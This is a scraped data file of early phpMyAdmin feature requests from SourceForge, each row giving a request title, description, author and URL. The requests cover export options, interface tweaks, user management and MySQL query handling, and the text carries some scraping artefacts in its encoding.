Original URL https sourceforge.net p phpmyadmin feature requests 281 https sourceforge.net p phpmyadmin feature requests 281 Original author willlangford","enhancement"
"24444","4983","code typeface should be Courier or any monospace typeface..
Using a font that is not monospace for code is driving me nuts!
A monospace font makes reading code and typing it a pleasurable experience.
Can we change all the code to a monospace typeface?
Original URL https sourceforge.net p phpmyadmin feature requests 282 https sourceforge.net p phpmyadmin feature requests 282 Original author knightt","enhancement"
"24444","4984","single field edit on mouse click.
In browse mode, we have a N M table of data imagine you can click on any value to be able to edit it directely in a small popup window displaying only the requested field like by pressing F2 in a spreadsheet software) ?
I thought it was already somewhere in the feature request list, but can t see it for the moment... Every field could be defined as a link, or we could add a small amp;quot;edit amp;quot; icon in every cell page size would be much bigger, but when displaying a reasonable number of rows 10 20) it should be ok I guess... Could be turned on off like the amp;lt; T amp;gt; amp;gt;T amp;lt; flag.
What do you think? )
Olivier Original URL https sourceforge.net p phpmyadmin feature requests 283 https sourceforge.net p phpmyadmin feature requests 283 Original author swix","enhancement"
"24444","4985","Having a amp;quot;PRINT amp;quot; button on a particular page..
In the page that comes up when you click on the xc2x93print viewxc2x94 link, everything looks fine except Wherexc2x92s that xc2x93PRINTxc2x94 button?
Sure I can do it by hand by clicking on the menu, but I noticed that some other page ahh yes the dictionary.. has a xc2x93PRINTxc2x94 button, so I think that there should be a xc2x93PRINTxc2x94 button to fit the trend.
Thanks for your time and your WONDERFULL xc2x93systemxc2x94.
I will be happy to see a button there in the next release, I will say xc2x93I thought of thatxc2x94 ) Original URL https sourceforge.net p phpmyadmin feature requests 284 https sourceforge.net p phpmyadmin feature requests 284 Original author hlusnagen","enhancement"
"24444","4986","exporting auto increment current value.
When exporting Structure and Data of a database or tables, can the auto increment value of each table be exported too ?
The resulting CREATE table statement should look like CREATE tbl name ... ) auto increment = amp;lt;value amp;gt; with amp;lt;value amp;gt; being the current value of the auto increment counter for tbl name.
This can be useful for full backup restore from one server to another.
Original URL https sourceforge.net p phpmyadmin feature requests 286 https sourceforge.net p phpmyadmin feature requests 286 Original author anonymous","enhancement"
"24444","4987","InnoDB Display all foreign keys of a table not in row.
it would be helpful if all foreign keys of a innodb table would be displayed row by row Original URL https sourceforge.net p phpmyadmin feature requests 287 https sourceforge.net p phpmyadmin feature requests 287 Original author toza","enhancement"
"24444","4988","Password Protection and User Groups.
I would like to see a system in which you must have a user account to the phpMyAdmin application.
I want to run this on my network, but I don t want any Joe Schmoe to figure out the address, and start dropping databases left and right.
How hard would it be to setup a system in which you must have an account and password to log into the phpMyAdmin app to make changes and administrate your MySQL databases?
Original URL https sourceforge.net p phpmyadmin feature requests 288 https sourceforge.net p phpmyadmin feature requests 288 Original author anonymous","enhancement"
"24444","4989","Show queries per second and hour.
I would like the server status page to show the number of total questions per second and per hour.
Original URL https sourceforge.net p phpmyadmin feature requests 289 https sourceforge.net p phpmyadmin feature requests 289 Original author electrum","enhancement"
"24444","4990","Only INSERT values a user has privileges for.
My configuration Windows 2000 prof, apache, PHP4.3, Mysql 4.0.11 gamma, phpmyadmin 2.4.0.
I have a user with INSERT permission for selected fields only in a table.
INSERTING new data set fails as he don t have INSERT permission to other fields and the SQL from phpmyadmin try to send complete set of fields.
If I trim the SQL by removing relevent fields, it goes through.
Is it not supported by 2.4.0?
rajaraman Original URL https sourceforge.net p phpmyadmin feature requests 290 https sourceforge.net p phpmyadmin feature requests 290 Original author rrraman","enhancement"
"24444","4991","unspecified) Hyperlink.
Patch request for a patch that would alter phpMyAdmin so that hyperlinks could be amp;quot;clickable amp;quot; when browsing the tables.
Original URL https sourceforge.net p phpmyadmin feature requests 291 https sourceforge.net p phpmyadmin feature requests 291 Original author anonymous","enhancement"
"24444","4992","InnoDB and select count ).
The function used to find the number of rows in a table is probably select count ) from table name.
While this might be extremely fast for MyIsam tables, it is ridiculously slow for large InnoDB tables.
For InnoDB tables the amp;quot;show table statistics amp;quot; command is almost immediate and correct ennough.
For InnoDB tables, InnoDB reads the whole table to determine the count ).
It would be nice if you guys could determine the of rows depending on the DB type?
Thanks!
jochen frey yahoo.com Original URL https sourceforge.net p phpmyadmin feature requests 293 https sourceforge.net p phpmyadmin feature requests 293 Original author anonymous","enhancement"
"24444","4993","SHOW FULL PROCESSLIST.
The script server processlist.php executes the SHOW PROCESSLIST query.
How about using SHOW FULL PROCESSLIST instead?
The difference is that the SQL query is cutted if it is very long when using SHOW PROCESSLIST while is is uncutted using SHOW FULL PROCESSLIST .
I found this in the documentation of MySQL 3.23.39 but it works in 3.23.37 as well... could not find any older version of either installed MySQL or documentation).
Original URL https sourceforge.net p phpmyadmin feature requests 292 https sourceforge.net p phpmyadmin feature requests 292 Original author ci dev","enhancement"
"24444","4994","history only for successful queries.
save mysql query to history only if mysql error ) is empty ... better for orientation ) ... or make this feature enabled disabled in by) config ... sorting a history by id not by timevalue ...
Original URL https sourceforge.net p phpmyadmin feature requests 298 https sourceforge.net p phpmyadmin feature requests 298 Original author jenix","enhancement"
"24444","4995","Moving copying Databases server independantly.
We have two servers databases) for a single website.
Phpmyadmin shows two servers to choose from.
But it doesnt provide any interface to copy one database to other.
Both databases have same user names and passwords.
dash raym yahoo.com Original URL https sourceforge.net p phpmyadmin feature requests 294 https sourceforge.net p phpmyadmin feature requests 294 Original author anonymous","enhancement"
"24444","4996","Runtime MySQL settings configuration.
As of MySQL 4.0, server settings can now be adjusted without having to reload the server.
It would be nice if phpMyAdmin could edit these via its own interface.
Original URL https sourceforge.net p phpmyadmin feature requests 295 https sourceforge.net p phpmyadmin feature requests 295 Original author sourceo","enhancement"
"24444","4997","Edit Delete Buttons for non table keys.
Running a query like so SELECT FROM stuff Will show the results with edit and delete links.
But, if you change it like the following, the delete and edit links will NOT show up, which is a little annoying SELECT , LENGTH bar) as len FROM stuff I ve not narrowed it down but it s odd and should be fixable.
I swear this isn t a bogus bug ) Original URL https sourceforge.net p phpmyadmin feature requests 296 https sourceforge.net p phpmyadmin feature requests 296 Original author aint","enhancement"
"24444","4998","back tick field names in SQL query insert.
When I have selected a table and choose SQL tab, I am able to write SQL statements.
There is a drop down of all field names of the selected table available.
I think it is more SQL conform to have those field names back ticked when they are inserted.
At the moment, they are inserted as is, that is, not back ticked.
Original URL https sourceforge.net p phpmyadmin feature requests 297 https sourceforge.net p phpmyadmin feature requests 297 Original author ci dev","enhancement"
"24444","4999","with selected add ANALYZE option.
2.5.0) with selected add ANALYZE option In database structure, a set of tables can be selected as well as a command which will be perform on them.
There is a repair table, optimize table, and a new amp;quot;check amp;quot; table, but no ANALYZE table.
I would like to ANALYZE the tables as well.
Original URL https sourceforge.net p phpmyadmin feature requests 299 https sourceforge.net p phpmyadmin feature requests 299 Original author anonymous","enhancement"
"24444","5000","Export table definitions to LaTeX.
Exporting the tables in LaTeX format is great, but it d be useful to export also the structure of the tables in LaTeX, not only the contents.
Original URL https sourceforge.net p phpmyadmin feature requests 300 https sourceforge.net p phpmyadmin feature requests 300 Original author anonymous","enhancement"
"24444","5001","Auto File Module AFM).
I will try to explain this new feature, then give an example of its use.
Feature; Automatically handle and download a file.
Insert; PMA would allow the client to browse for a local file.
On submit, it would check the file needs settings from afm settings table).
Then, download the file, saving it as the new name.
Insert the new name into the DB cell for that record submitted by client.
Delete; Check if there is a field match in afm settings.
If so, Deletes file, and proceeds to normal deleting of record.
Update; Check if there is a difference in file names.
If so proceed to insert new file and details.
USE, example; Human profiles.
Name, Photo file name fields.
Type a string for the Name, and have a Browse button for Photo file name.
Storing a humans Name and Photo picture is not only text, so this process would have to be done with a custom made page.
With this mod, custom made pages of this type) would no longer be necessary.
This mod would help save alot of clients time and errors.
Especially lazy server file management.
I would like to help code this mod.
Cheers, Hail the Coding God Original URL https sourceforge.net p phpmyadmin feature requests 301 https sourceforge.net p phpmyadmin feature requests 301 Original author anonymous","enhancement"
"24444","5002","Export tables in predefined order.
I modified the export routines to read a file that sets up a predefined order for the exporting of the tables.
This is very handy for me as we enforce integrity rules, so I can t just use an alpahbetical export and import.
They need to be in the correct order.
The user can check the box to read order from file, which then reads in the order for the tables.
The file must be called export order.inc.
php and must be sitting in the root of phpMyAdmin.
If you don t select any of the tables from the select box then it will export everything in the order it is in the file.
If you select tables then it will export only the selected tables in the correct order they should be exported in.
I only tested and set it up for the SQL type, not XML, CVS, or Latex.
I used the latest 2.5.0 rc1 release to make the changes in.
Attached are the files I changed along with an example of the export order.inc.php file.
Original URL https sourceforge.net p phpmyadmin feature requests 302 https sourceforge.net p phpmyadmin feature requests 302 Original author ngoff79","enhancement"
"24444","5003","amp;quot;reset amp;quot; at data change.
It would be way cool, if there would exist a simple HMTL amp;quot;reset amp;quot; button below the form where one can change edit values of a row.
Just in case one mistyped or e.g.
clicked on a multiselect box and all previous selections are gone.
Original URL https sourceforge.net p phpmyadmin feature requests 303 https sourceforge.net p phpmyadmin feature requests 303 Original author anonymous","enhancement"
"24444","5004","Get rid of redirects [sessions?].
As we sometimes hit limit of GET requests, we should try to get rid of them.
Anything that we currently solve by redirects, should be IMHO solved by just including.
Redirects are currently used on 10 places, so it should not be so hard to get rid of them...
Original URL https sourceforge.net p phpmyadmin feature requests 304 https sourceforge.net p phpmyadmin feature requests 304 Original author nijel","enhancement"
"24444","5005","Move total query statistics.
The table that shows per hour minute second query statistics would be easier to see and read if it were above the query type table and not below it.
Glad to see that table was added, though.
Original URL https sourceforge.net p phpmyadmin feature requests 305 https sourceforge.net p phpmyadmin feature requests 305 Original author electrum","enhancement"
"24444","5006","Structuring of Tables nested folders).
Hi, I wanted to know if it was possible to structure tables with same prefixes to get a better overview.
If you only have one database but more different pages, you can make a prefix previous to the real tablename e.g.
pg1 news, pg1 stats, ...) Now my question is Is it possible to adjust the prefixes like in an explorer menu for a better overview and easier administration?!
It would be a nice feature I think!
Original URL https sourceforge.net p phpmyadmin feature requests 306 https sourceforge.net p phpmyadmin feature requests 306 Original author thetiger2k","enhancement"
"24444","5007","new Idea connecting .... when the first conection set in config fail, show server select on web page ... to try select another 2nd, 3rd) server ...
Original URL https sourceforge.net p phpmyadmin feature requests 307 https sourceforge.net p phpmyadmin feature requests 307 Original author jenix","enhancement"
"24444","5008","Export SQL file with block inserts.
It would be great if it was possible to export data from tables as SQL block insert statements, ie INSERT INTO table id,field) VALUES 1 , text1 ), 2 , text2 ), 3 , text3 ); This would reduce the size of the SQL export file and speed up the insertions into the new table.
Regards... Tom Original URL https sourceforge.net p phpmyadmin feature requests 313 https sourceforge.net p phpmyadmin feature requests 313 Original author anonymous","enhancement"
"24444","5009","after 2.5.0) Do not store dump in memory when not needed.
Trying to export an database, which is bigger than allowed memory limit in PHP, causes error like this Fatal error Allowed memory size of 10485760 bytes exhausted tried to allocate 5080860 bytes) I explored the source of amp;quot;tbl dump.php amp;quot; and noticed, that PMA always saves whole dump in a variable, before flushing it to user.
Is it maybe possible to flush dumpdata immediately ?
Original URL https sourceforge.net p phpmyadmin feature requests 308 https sourceforge.net p phpmyadmin feature requests 308 Original author anonymous","enhancement"
"24444","5010","UTF8 support.
When the DB must contain UTF8 data it would be handy to have a UTF8 amp;quot;localization amp;quot; or, rather, a PHP conversion of existing localizations to UTF8) as data send by the browser in the TEXTAREAs is in the same format as the page is displayed, so to insert text in UTF8 format much text of phpMyAdmin itself is not correctly readable.
Original URL https sourceforge.net p phpmyadmin feature requests 309 https sourceforge.net p phpmyadmin feature requests 309 Original author lapo","enhancement"
"24444","5011","Easy Mannagement of MySQL users.
I would like to see easy mannagement of mysql users.
A project I am working on is a server that may host multiple databases but the server operatior is not familure with MySQL.
This person really needs to be able to easly mannage his mysql users.
I know that now you can mannage your permissions but you have to manually run grant and revoke querys when adding and removeing a new user.
Would it be possable to build the ability to add and remove users when logged into the root user account?
Original URL https sourceforge.net p phpmyadmin feature requests 310 https sourceforge.net p phpmyadmin feature requests 310 Original author cattack","enhancement"
"24444","5012","Show result for multi statement SQL queries.
Please try this, once in terminal, once in phpMySQL...
It seems the parser is doing something as this request should work fine in both cases.
Or perhaps it is php ?
phpMyAdmin MySQL Dump version 2.4.0 http www.phpmyadmin.net download page) Host localhost Generation Time Apr 28, 2003 at 10 34 AM Server version 3.23.55 PHP Version 4.1.2 Database `test` Table structure for table `stat` CREATE TABLE stat day date NOT NULL default 0000 00 00 , hits int 10) unsigned NOT NULL default 0 , PRIMARY KEY day) ) TYPE=MyISAM; Dumping data for table `stat` INSERT INTO stat VALUES 2003 04 24 , 123); INSERT INTO stat VALUES 2003 04 25 , 234); INSERT INTO stat VALUES 2003 04 26 , 1024); INSERT INTO stat VALUES 2003 04 27 , 2000); SELECT day, hits , cumul =ifnull cumul hits,hits)) as cumul FROM `stat` ; This works perfectly in mysql shell, not in phpMyAdmin... Should give | day | hits | cumul | | 2003 04 24 | 123 | 123 | | 2003 04 25 | 234 | 357 | | 2003 04 26 | 1024 | 1381 | | 2003 04 27 | 2000 | 3381 | In phpMyAdmin, the cumul col is wrongly equal to hits...
Regards Original URL https sourceforge.net p phpmyadmin feature requests 311 https sourceforge.net p phpmyadmin feature requests 311 Original author anonymous","enhancement"
"24444","5013","Export improvements.
This item is created just to collect things that are requested from export feature.
I currently found RFEs 517562, 632237 and 5390201.
I really didn t read whole huge texts there, but IMHO wanted things are just save exported files on server split export to parts also for above) Original URL https sourceforge.net p phpmyadmin feature requests 312 https sourceforge.net p phpmyadmin feature requests 312 Original author nijel","enhancement"
"24444","5014","Generate a set of PHP pages for browse insert upd del datas.
Hi!
maybe the title is not really clear...
I enjoy using PhpMyAdmin !
but I wan t to be able to write select insert update forms like in the phpMyAdmin A really good feature would be amp;quot;Generate a set of PHP pages for browsing, inserting, updating or deleting data amp;quot; Here is a little example with a simple table id, name, email) and this script will generate the following pages connect.php mysql connect ...) index.php include connect.php ); a form for selecting data e.g.
amp;lt;form action= amp;quot;select.php amp;quot; amp;gt; Name amp;lt;input type= amp;quot;text amp;quot;... amp;gt; Email amp;lt;input type= amp;quot;text amp;quot;... amp;gt; Writes input type=text select checkboxes... for search options amp;lt;input type= amp;quot;submit amp;quot; value= amp;quot;Search amp;quot; amp;gt; amp;lt; form amp;gt; and the select.php perform the search print a table like in phpmyadmin) update.php insert.php like in phpmyadmin, a form with input text checkboxes select.
Not necessarily the amp;quot;function amp;quot; column !
just the name of the column and the correct input type.
Don t want any auto increment a script which perform the update insert, checking not null, unique, primary....
This set of page will perform the basic tasks for a lot of script a simple guestbook, a dictionnary...) and the user me in that case D) will customize form... but all the hard an repetitive for each script!)
task will be automatically generated.
I know that s may be difficult to do... if only I had time to participate to the project... but I don t have Have a good day amp;lt; iubito amp;gt; Original URL https sourceforge.net p phpmyadmin feature requests 314 https sourceforge.net p phpmyadmin feature requests 314 Original author iubito","enhancement"
"24444","5015","Too easy to delete source table when copying.
I discovered all this because I have a live database and a beta database and I use the copy table feature to amp;quot;synch amp;quot; the tables once in a while.
When copying a table with amp;quot;Add drop table amp;quot; it is very easy to wipe out the table if you are trying to copy the table to a different database with the same table name.
If you forget to change the database you will wipe out the table and then get an error when it tries to do the inserting.
An easy fix would be to both force the selection of the database as well as double check before performing the drop table to make sure you aren t trying to copy to the same table in the same DB.
Another good option would be to have a choice when copying amp;quot;Data Only amp;quot; or amp;quot;Structure and data amp;quot; that would allow you to empty the target table first.
This was on MySQL 3.23.38 with PMA 2.5.0 rc2 I know it was my own fault, but it would be nice to have the software protect me from being stupid.
Original URL https sourceforge.net p phpmyadmin feature requests 315 https sourceforge.net p phpmyadmin feature requests 315 Original author anonymous","enhancement"
"24444","5016","Configurable menus.
Hi, I have set up laboratory infomation data management system Apache, MySQL, phpMyAdmin).
Now some people feel www interface more complicated.
In order to make www interface to database more intuitive and simpler for laboratory stuff it should be possible to hide certain pages from phpMyAdmin GUI.
There could be two different modes of operation Basic and Admin).
For example in database view only Export , Search and Query tabs should be visible in Basic mode.
In table view only Browse , Select , Insert and Export tabs should be visible in Basic mode.
This new feature could be configurable through config.ini.php3.
Ofcourse in Admin mode all the possible pages should be visible.
I know that phpMyAdmin in designed for database admins but this new feature would make phpMyAdmin more suitable also for other purposes.
Simpler GUI mode would provide more general GUI to database without administrative functions.
Normal users not admins) would see simpler interface and feel them selves more comfortable.
Teemu Original URL https sourceforge.net p phpmyadmin feature requests 316 https sourceforge.net p phpmyadmin feature requests 316 Original author kuulasma","enhancement"
"24444","5017","Improvements to LOAD DATA LOCAL) INFILE.
Hi, The amp;quot;Insert data from a textfile into table amp;quot; feature proceeds in to steps 1\.
The user file is first uploaded to the web server host where it is stored in the tmp directory) 2\.
phpMyAdmin performs a amp;quot;LOAD DATA INFILE amp;quot; request which is WRONG!
Instead it should perform a amp;quot;LOAD DATA LOCAL INFILE amp;quot; because the file to be loaded is located on the MySQL client host, not on the MySQL server host.
However, in most situations, the server and the client are both running on the same host.
So there is no difference beetween doing a amp;quot;LOAD DATA INFILE amp;quot; or a amp;quot;LOAD DATA LOCAL INFILE amp;quot; request ... except that, in the first case, you need the FILE privilege in addition to the INSERT or UPDATE privileges).
In the second case, you don t need the FILE privilege.
The FILE privilege is ONLY needed when you want to read data from text files located on the server !
Cheers, Hervxc3xa9 Pagxc4x8ds INRP France pages inrp.fr Original URL https sourceforge.net p phpmyadmin feature requests 321 https sourceforge.net p phpmyadmin feature requests 321 Original author anonymous","enhancement"
"24444","5018","30 sec timeout workaround....
If this is already requested then forget this and throw it away... We all know the 30 sec timeout problem.
However when you insert by hand) enough amp;quot;INSERT amp;quot; instructions that each last less than 30 seconds you can import files of many MB s long.
My Feature bug) request is to try to time your export routines so it devide the exported instructions to last less than 30 seconds.
At this moment table dump is exported into a single INSERT instruction, how many rows does not matter.
Thanks in front... Bas Burger.
yaa at euronet dot nl Original URL https sourceforge.net p phpmyadmin feature requests 323 https sourceforge.net p phpmyadmin feature requests 323 Original author anonymous","enhancement"
"24444","5019","flush privileges command.
Maybe there is no need to reload mysql after adding users or databases.
If you create link, that runs amp;quot;flush privileges; amp;quot;, people won t have to search for a place, where they can run that sql command on server.
Original URL https sourceforge.net p phpmyadmin feature requests 317 https sourceforge.net p phpmyadmin feature requests 317 Original author tokul","enhancement"
"24444","5020","display wide textarea when type is longtext.
A slight modification to the way phpMyAdmin displays longtext , it will not display the textarea element to the right of a row just like any other type), but instead it will start a new row beneath it and use the entire width of the table to display the textarea element.
I found this useful for editing large chunks of HTML that were stored in a longtext ... Maybe it s worth an extra config var wideLongtext = TRUE ???).
included is a patch for tbl change.php taken from the 2.5.0 release Original URL https sourceforge.net p phpmyadmin feature requests 318 https sourceforge.net p phpmyadmin feature requests 318 Original author remcoa","enhancement"
"24444","5021","Show insert id after INSERT.
what about showing the auto increment mysql insert id) after submitting a new database row?
MfG Michael Metz SpeedPartner Original URL https sourceforge.net p phpmyadmin feature requests 319 https sourceforge.net p phpmyadmin feature requests 319 Original author greno2","enhancement"
"24444","5022","Export) auto disable file options.
In the xc2x93Exportxc2x94 tab, I think it would be cool if the xc2x93Save as filexc2x94 options would be disabled via JavaScript) when the check box is unchecked.
This should be quite trivial to implement.
Good luck.
Original URL https sourceforge.net p phpmyadmin feature requests 320 https sourceforge.net p phpmyadmin feature requests 320 Original author hlusnagen","enhancement"
"24444","5023","cfg[ LimitChars ] only limits TEXT BLOB.
I have been speaking with Lem99 off line about this.
I believe cfg[ LimitChars ] needs to be changed, or at least updated.
I am not sure Marc agrees with me.
But let me ask you to keep these two questions in mind as you are reading amp;quot;what was the original use of cfg[ LimitChars ] ?
amp;quot; amp;quot;Was it to limit the length of what the user sees in the browse window.
Why does it not apply to other potentially long fields as well?
amp;quot; As Marc mentions, cfg[ LimitChars ] should instead be named cfg[ LimitTextBlob ].
I believe the project should go one step further apply cfg[ LimitChars ] to ALL potentially long fields in the browse window.
I am not talking about a specific request that would only be useful for me.
This is not a special request ONLY useful for me!
It will be useful for everyone who appreciates what cfg[ LimitTextBlob ] does!
My reasoning is that if cfg[ LimitChars ] is useful in limiting the length of Text and Blob fields in the browse window, it will also be useful in limiting other fields whose possible long length obstructs the zen of what cfg[ LimitTextBlob ] is trying to accomplish.
For example, it does not apply to a varchar 255) or a longtext.
Why not a longtext at least?
I suspect, it does not apply to a mediumtext, mediumblob or longblob field.
But cfg[ LimitChars ] should apply to these potentially long fields, otherwise what purpose does cfg[ LimitChars ] serve?
Applying cfg[ LimitChars ] to date, datetime, year or time MIGHT be a waste of time.
But I am sure a majority of users would appreciate cfg[ LimitChars ] applying to varchars or other long in length fields cfg[ LimitChars ] should have a greater, more useful purpose to limit chars, not just text and blob.
jtjohnston Original URL https sourceforge.net p phpmyadmin feature requests 322 https sourceforge.net p phpmyadmin feature requests 322 Original author jtjohnston","enhancement"
"24444","5024","lite version.
I think PMA is a great web application.
Although it does run on the large side as far as size is concerned.
Over 5MB decompressed.
Maybe you guys could code a PMA Lite version that has just the basic features like SELECT,INSERT,UPDATE,ALTER and the export feature.
Just a suggestion =) Original URL https sourceforge.net p phpmyadmin feature requests 324 https sourceforge.net p phpmyadmin feature requests 324 Original author brosner","enhancement"
"24444","5025","Export Replace amp;quot;NULL amp;quot; with alternative string.
Hi, Would it be possible to add one new parameter for table result export.
I would like to have amp;quot;Convert NULL values to amp;quot; or something like that.
When I am exporting table in CSV format I would not like to see amp;quot;NULL amp;quot; strings in place of NULL values.
It would like to be able to replace amp;quot;NULL amp;quot; strings with alternative string like amp;quot; amp;quot; ).
If I have NULL values in CSV file I have to use external program to replace amp;quot;NULL amp;quot; strings with blank strings.
This is because amp;quot;NULL amp;quot; and amp;quot; amp;quot; values in database serves the same information.
Teemu Original URL https sourceforge.net p phpmyadmin feature requests 325 https sourceforge.net p phpmyadmin feature requests 325 Original author kuulasma","enhancement"
"24444","5026","Default export options.
Hi, Would it be possible to define default values for different exporting parameters in config.inc.php3.
Now separator, enclosed and escaped, add character and csv replace null are hard coded in display export.lib.php3.
This would be simple but very handy addition.
Teemu Original URL https sourceforge.net p phpmyadmin feature requests 326 https sourceforge.net p phpmyadmin feature requests 326 Original author kuulasma","enhancement"
"24444","5027","Multiple column display.
The ability to specify the number of columns in the table display.
Since I run my monitor at 1600 x 1200 and have 160 tables, it is much more efficient for me to have multiple columns in the table display, see attachment.
I currently have 5 table row columns.
The other request I put in requesting short labels for the actions is also helpful since the page is wide.
Sample code is below.
db details structure.php if !
cfg[ num table columns ]) cfg[ num table columns ] = 1; num = ceil num tables cfg[ num table columns ]) 1; if num tables amp;gt; num) if row count num)) == 0) \{ bgcolor = cfg[ BgcolorTwo ]; row count = 1; print amp;quot; amp;lt; tr amp;gt; amp;lt; table amp;gt; amp;lt; td amp;gt; amp;lt;td valign=top amp;gt; amp;quot;; print header rows ); \} config.inc.php cfg[ num table columns ] = 5; number of table columns to display Original URL https sourceforge.net p phpmyadmin feature requests 334 https sourceforge.net p phpmyadmin feature requests 334 Original author boogie33","enhancement"
"24444","5028","MD5 values on the project webpage.
I have not been able to find any MD5 values for the released packages, if they are already available please disregard this feature request.
Original URL https sourceforge.net p phpmyadmin feature requests 327 https sourceforge.net p phpmyadmin feature requests 327 Original author anonymous","enhancement"
"24444","5029","No Frames.
It would be nice to have a the ability in the config to have a no frames version.
It would still show what is on the frame right now, but it would help me to have a non frames option.
Thanks, Will Original URL https sourceforge.net p phpmyadmin feature requests 328 https sourceforge.net p phpmyadmin feature requests 328 Original author willlangford","enhancement"
"24444","5030","Config Page.
It would be nice once the installer script is done to have have a page in phpmyadmin itself to change those options whenever we want.
and then when logged in as root with the phpmyadmin database make it so only certian mysql users can change the phpmyadmin options, thanks for all the good work, Will Original URL https sourceforge.net p phpmyadmin feature requests 329 https sourceforge.net p phpmyadmin feature requests 329 Original author willlangford","enhancement"
"24444","5031","New Login Idea.
Would it be possible to haev the login box go away and just have a login form?
I just personally life forms better.
Thanks, Will Original URL https sourceforge.net p phpmyadmin feature requests 330 https sourceforge.net p phpmyadmin feature requests 330 Original author willlangford","enhancement"
"24444","5032","Insert more than one row at a time.
would it be possible to have more than one incert feild.
when adding lots of data it gets annoying haveing to hit add each time.
thanks, Will Original URL https sourceforge.net p phpmyadmin feature requests 331 https sourceforge.net p phpmyadmin feature requests 331 Original author willlangford","enhancement"
"24444","5033","Cleanup of PMA tables on multi submits.
Duing copying, moving that went probably okay) and dropping this is probably the problem) I got many entries in PMA tables that have no use, it would be nice if either they could be removed when dropping table database or add some maintanance page, that would allow to remove not needed rows from those tables.
Original URL https sourceforge.net p phpmyadmin feature requests 332 https sourceforge.net p phpmyadmin feature requests 332 Original author nijel","enhancement"
"24444","5034","Export as RDF option.
I just upgraded to phpMyAdmin 2.5.1, and I like its XML export option.
Might it be feasible to export as RDF as well?
RDF is another XML language, a little bit more generic.)
Original URL https sourceforge.net p phpmyadmin feature requests 333 https sourceforge.net p phpmyadmin feature requests 333 Original author jslab","enhancement"
"24444","5035","Execute uploaded gzip bzip d SQL files.
When I upload a gzipped amp;quot;.gz amp;quot; file to my upload directory, the file does not appear in the amp;quot;web server upload amp;quot; drop down list on the SQL tab.
.sql files placed in the same directory are visible.
Original URL https sourceforge.net p phpmyadmin feature requests 335 https sourceforge.net p phpmyadmin feature requests 335 Original author oejack","enhancement"
"24444","5036","Auth) True logout in HTTP mode.
Resolve issue described in FAQ 3.1.
Original URL https sourceforge.net p phpmyadmin feature requests 336 https sourceforge.net p phpmyadmin feature requests 336 Original author lem9","enhancement"
"24444","5037","One file per table export.
Feature phpMyAdmin should have and option when exporting multiple tables to generate one file per table e.g.
when exporting tblA, tblB and tblC it should generate 3 files tblA.sql, tblB.sql, tblC.sql).
Now I know this is impossible in the direct amp;quot;stream amp;quot; export none, gzipped, zipped, bzipped), but maybe it could be supported by a .tar.gz option.
Original URL https sourceforge.net p phpmyadmin feature requests 342 https sourceforge.net p phpmyadmin feature requests 342 Original author philipx","enhancement"
"24444","5038","MySQL function prototype in SQL frame.
It would be useful to have the prototype and doc onmouseover would be enough) in the frame where we can make SQL query.
it would prevent us to look for it in the horrrrrible MySQL.com doc.... op Original URL https sourceforge.net p phpmyadmin feature requests 337 https sourceforge.net p phpmyadmin feature requests 337 Original author paquerette","enhancement"
"24444","5039","PHP CODE simple.
When you execute a query you have a button that writes php code and it gives something like sql = SELECT ; sql .= FROM `programs` ; sql .= WHERE 1 LIMIT 0, 30 ; In turms of perfemance and logic it sould be sql = SELECT .
FROM `programs` .
WHERE 1 LIMIT 0, 30 ; This is now one commant insted of 3.
I put it as a FEATURE request becouse it s not sever ength to be a bug....
Original URL https sourceforge.net p phpmyadmin feature requests 339 https sourceforge.net p phpmyadmin feature requests 339 Original author hatky","enhancement"
"24444","5040","MySQL Error code in Error statement.
I d find very useful to have error codes displayed on query error.
It should be very simple it only needs minor update to PMA mysql error.
I paste a sample PMA mysql error function PMA mysql error id = FALSE) \{ if id != FALSE) \{ return PMA convert display charset mysql error id).
.mysql errno id). )
); \} else \{ return PMA convert display charset mysql error ).
.mysql errno ). )
); \} \} Original URL https sourceforge.net p phpmyadmin feature requests 340 https sourceforge.net p phpmyadmin feature requests 340 Original author yakky","enhancement"
"24444","5041","Executing SQL many times.
It might be very usefull to have the possibility to reexecute a SQL command like shown on screenshot.
Il pourait xc4x99tre super intxc3xa9ressant de pouvoir rxc3xa9exxc3xa9cuter une command SQL plusieurs fois.
Genre si je supprime des entrxc3xa9s et que je veux les supprimers une nouvelle fois, sans pour autant passer par modifer et la relancer.
Original URL https sourceforge.net p phpmyadmin feature requests 341 https sourceforge.net p phpmyadmin feature requests 341 Original author plom","enhancement"
"24444","5042","hide special tables.
When using a single database to store both actual data as well as the special tables used for relationships and so forth, it would be convenient if those tables were hidden by default in the list.
Putting them in a separate database would make more sense, but I don t have that option, since my phpMyAdmin installation is in my own directory, not something my provider gives me, and I don t have sufficient access to create and set up the separate database) prp17 adelphia.net Original URL https sourceforge.net p phpmyadmin feature requests 343 https sourceforge.net p phpmyadmin feature requests 343 Original author anonymous","enhancement"
"24444","5043","Add checkbox for AUTO INCREMENT export.
First mentioned in forum I am annoyed at the amp;quot;AUTO INCREMENT amp;quot; addition to the table export.
Please either include a checkbox to exclude this or make it switchable in the config file.
For me, it is useless and I must edit it out hence an extra step) when I want to export then recreate a table.
Yeah, it s nice that mysql supports this, but not everything is a good idea.
More importantly, either disable it or have a checkbox or WARN the user when they use the amp;quot;copy table to amp;quot; feature under amp;quot;Operations amp;quot;.
This used to work beautifully until amp;quot;AUTO INCREMENT amp;quot; was added 2.5.1?).
W o any warning, it worked differently and it messed up my IDs for a table I wanted them to start at 1, not 94823).
Original URL https sourceforge.net p phpmyadmin feature requests 346 https sourceforge.net p phpmyadmin feature requests 346 Original author nijel","enhancement"
"24444","5044","relational insert swap key and content.
I have a relation defined and want to insert a new row.
I get a dropdown where I can select an ID based on the content of the foreign table.
The problem is, that the values are amp;quot; amp;lt;ID amp;gt; amp;lt;content amp;gt; amp;quot;, but amp;quot; amp;lt;content amp;gt; amp;lt;ID amp;gt; amp;quot; would be easier to navigate through, as pressing any letter will then make the browser jump to the first value starting with that letter.
Original URL https sourceforge.net p phpmyadmin feature requests 344 https sourceforge.net p phpmyadmin feature requests 344 Original author ci dev","enhancement"
"24444","5045","Normalize a table.
Hi, phpMyAdmin should normalize a table.
This means that I can select one or more columns from a table, phpMyAdmin can extract them top another table and fills a different column in the old table with the primary index.
Possible options counld be automaticly create the new table automaticly create the index column add a comment and the depends in the phpMyAdmin Database Search for an exiting item before insert in case the new table exists and has some items) regards, Michael Original URL https sourceforge.net p phpmyadmin feature requests 345 https sourceforge.net p phpmyadmin feature requests 345 Original author misi67","enhancement"
"24444","5046","allow table with transformed column anywhere in FROM clause.
There are situations where the the ordering of the tables in the FROM clause cannot allow if one is avoiding a RIGHT OUTER JOIN) the table with the transformed column to be first in the the table list in the FROM clause.
